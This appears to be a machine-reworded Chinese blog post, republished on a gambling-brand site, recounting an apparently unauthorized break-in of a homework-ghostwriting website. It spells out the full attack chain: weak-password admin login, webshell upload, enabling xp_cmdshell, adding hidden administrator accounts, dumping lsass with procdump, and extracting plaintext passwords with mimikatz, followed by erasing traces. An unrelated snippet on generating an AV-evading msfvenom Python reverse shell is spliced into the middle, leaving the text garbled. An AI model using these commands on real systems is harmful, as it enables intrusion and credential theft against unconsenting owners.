记一次风趣的渗入测试 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

记一次风趣的渗入测试

申博_行业观察 申博 68次浏览 未收录 0个评论

他人都放假了我们却还在小学期中,这两天女朋友总是埋怨小学期功课难做,然后她本日发明淘宝上有人费钱代做,遂发来网址让我看看

记一次风趣的渗入测试

咱也不知道,咱也不敢问

然后反手一个弱口令进了背景

记一次风趣的渗入测试

实在这个站有注入,不过既然进了背景,那一定要去shell啊,找了个门生的账号上岸进入发明了头像上传点能够恣意文件上传

直接传了个大马,实行命令看下权限

记一次风趣的渗入测试

这权限也太小了吧,先来提权,看下补丁

记一次风趣的渗入测试

这还不随便打了,传了几个提权exe以后发明都实行不了,能够被杀软杀掉了,然后尝试抓hash

记一次风趣的渗入测试

看来只要pwdump7.exe没被杀了,然则权限不够

如今我们的权限能去读一些文件,去翻一翻sqlserver的暗码,尝试sqlserver来提权

开启xp_cmdshell

MSF利用python反弹shell-Bypass AV

本文主要介绍两种利用msf生成python版 payload,并利用Py2exe或PyInstaller将python文件转为exe文件,可成功bypass某些AV反弹shell msf-python反弹shell姿势1 1) msfvenom生成python后门 msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.20.131 LPORT=4444 -f raw -o /tmp/mrtp.py 生成的mrtp.py文件如下: import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,’UTF-8′)}[sys.version_inf

exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;

记一次风趣的渗入测试

成了,有权限了,尝试加个管理员?

exec master..xp_cmdshell 'net user test pinohd123. /add'    增加用户test,暗码test
exec master..xp_cmdshell 'net localgroup administrators test add'    增加test用户到管理员组

Wtm,加不上啊,杀软拦了,再次运用pwdump7来抓hash

记一次风趣的渗入测试

本来就开着3389,直接连上去

记一次风趣的渗入测试

Wtm开着管家和金山,传的东西都被阻拦了,关掉杀软,先加个隐蔽用户

net user test$ pinohd123. /add
net localgroup administrators test$ add

这里lz1y告诉我也能够procdump去搞,procdump是官方的东西,不会被杀软杀

exec master..xp_cmdshell 'xxxx\images\button\Procdump.exe -accepteula -ma lsass.exe -o xxx.dmp'

记一次风趣的渗入测试

把2.dmp存到本来来合营mimikatz

mimikatz.exe
sekurlsa::minidump 2.dmp
sekurlsa::logonPasswords full

记一次风趣的渗入测试

记一次风趣的渗入测试

一样拿到明文。

怎样没有域,擦了足迹溜了。


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明记一次风趣的渗入测试
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址